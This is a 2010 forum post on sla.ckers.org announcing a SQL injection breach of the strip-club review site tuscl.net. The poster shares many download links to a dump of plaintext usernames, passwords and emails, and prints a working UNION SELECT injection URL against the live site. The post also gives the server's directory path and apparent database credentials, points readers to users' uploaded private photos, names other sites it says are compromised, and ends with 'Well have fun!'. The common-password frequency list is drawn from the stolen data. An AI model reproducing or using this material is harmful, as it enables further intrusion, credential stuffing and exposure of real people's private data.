Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
TUSCL.net SQL injection 20k Plain Text Pass & 80K Emails
Posted by: tuscl
Date: September 04, 2010 08:53AM

I found many sql injections on Tuscl.net (The ultimate strip club list)

I tried notifying the site, no response. The server is ran on a vmware. So
anything that is done to it is restored, apon reboot.

This is a dump of usernames passwords and emails for the site. They are in
plain text. I have removed records that had the system generated password
that the user never changed.

http://tinyurl.com/397rzqs
http://bit.ly/bkVnPY
http://is.gd/eTqna
http://jump.fm/FOJRO
http://www.mediafire.com/?l6i1vd25il61a6b
http://www.megafileupload.com/en/file/265174/users-sql-zip.html
http://www.4shared.com/file/w0qqRyDf/userssql.html
http://rapidshare.com/files/416858410/users.sql.zip
http://rapidshare.com/files/416860069/users.sql.zip
http://www.speedyshare.com/files/24097837/users.sql.zip
http://uploading.com/files/e1741mm9/users.sql.zip/
http://bit.ly/cFvd8B
http://is.gd/eTsn5


http://www.tuscl.net/c.php?CID=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17

Common Passwords and the number of accounts that shared them

password - 269
123456 - 173
tuscl - 84
stripper - 67
qwerty - 62
12345 - 49
12345678 - 47
1234 - 42
baseball - 36
monkey - 36
princess - 34
stripclub - 33
strip - 32
jennifer - 32
abc123 - 32
mustang - 31
pussy - 29
lapdance - 27
andrew - 27
jmh1978 - 27
letmein - 27
fuckyou - 27
696969 - 27
michelle - 26
harley - 25
dallas - 25
111111 - 25
shadow - 24
corvette - 24
trustno1 - 24
sunshine - 22
dragon - 21
jordan - 21
love - 21
butthead - 20
batman - 20
danielle - 20
buster - 20
password1 - 20
hello - 20
biteme - 20
gaydar - 20
Michael - 19
george - 19
hockey - 19
ginger - 19
6969 - 19
Bandit - 19
lasvegas - 18
taylor - 18
tigger - 18
yankees - 18
chicago - 18
fucker - 18
blahblah - 17
football - 17
1escobar2 - 17
1111 - 17
Jessica - 17
123456789 - 16
testing - 16
phoenix - 16
badboy - 16
gemini - 16
ranger - 16
heather - 15
gateway - 15
secret - 15
welcome - 15
654321 - 15
aaaaaa - 15
tennis - 15
asshole - 15
maggie - 14
pepper - 14
charlie - 14
golfer - 14
strippers - 14
redskins - 14
summer - 14
peanut - 14
chicken - 13
jeremy - 13
hunter - 13
m0ntlure - 13
fuckoff - 13
dancer - 13
bitch - 13
lucky - 13
whatever - 13
killer - 13
prince - 13
robert - 13
orange - 13
thomas - 13
hawaii - 12
redsox - 12
tiger - 12
titties - 12
gators - 12
Password - cnt
florida - 12
kitten - 12
austin - 12
merlin - 12
canada - 12
diamond - 12
boston - 12
master - 12
yellow - 12
falcon - 12
jasmine - 12
1234567 - 12
cookie - 12
superman - 12
midnight - 12
blowme - 12
jackass - 12
sparky - 12
peekaboo - 11
doctor - 11
brandy - 11
8675309 - 11
madison - 11
braves - 11
brooklyn - 11
money - 11
anthony - 11
samantha - 11
ashley - 11
lucky1 - 11
amanda - 11
booboo - 11
SOCCER - 11
tarheels - 11
bigdog - 11
pookie - 11
private - 11
tiffany - 11
martin - 11
silver - 11
lakers - 10
eatme - 10
junior - 10
platinum - 10
sex - 10
iloveyou - 10
nicole - 10
vegas - 10
wolfpack - 10
55555555 - 10
barney - 10
melissa - 10
molly - 10
passw0rd - 10
sexy - 10
nascar - 10
dietcoke - 10
chris - 10
boomer - 10
test123 - 10
johnny - 10
red123 - 10
asdfgh - 10
ncc1701 - 10
314159 - 10
internet - 10
jackson - 10
computer - 10
peaches - 10
horny - 10
sierra - 10
rush2112 - 10

Here is the complete list of email addresses registered. The site had no
validated so, I am sure, some are fake.
http://www.tuscl.net/emails.zip
http://rapidshare.com/files/416871314/emails.zip
http://www.mediafire.com/?67rzfbvmyr1c492
http://www.speedyshare.com/files/24098846/emails.zip
http://www.megafileupload.com/en/file/265210/emails-zip.html

The path to the working directory is: /home/httpd/vhosts/tuscl.net/httpdocs/

The SQL information is
"localhost" - "tuscl" - "szg4wpl9"

Also if you want to look at all the nudey photos uploaded here is where they
are
http://www.tuscl.net/pictures/

There are other sites that could have been comprimised as well:
vanjonesthinksimanasshole.com
tuscl.com
onerun.com
ecampguide.com (contains another 1200 plain text passwords)
troopedge.com

Well have fun!
Owner or media if you want get ahold of me:
auto595158@hushmail com

Options: ReplyQuote


Sorry, only registered users may post in this forum.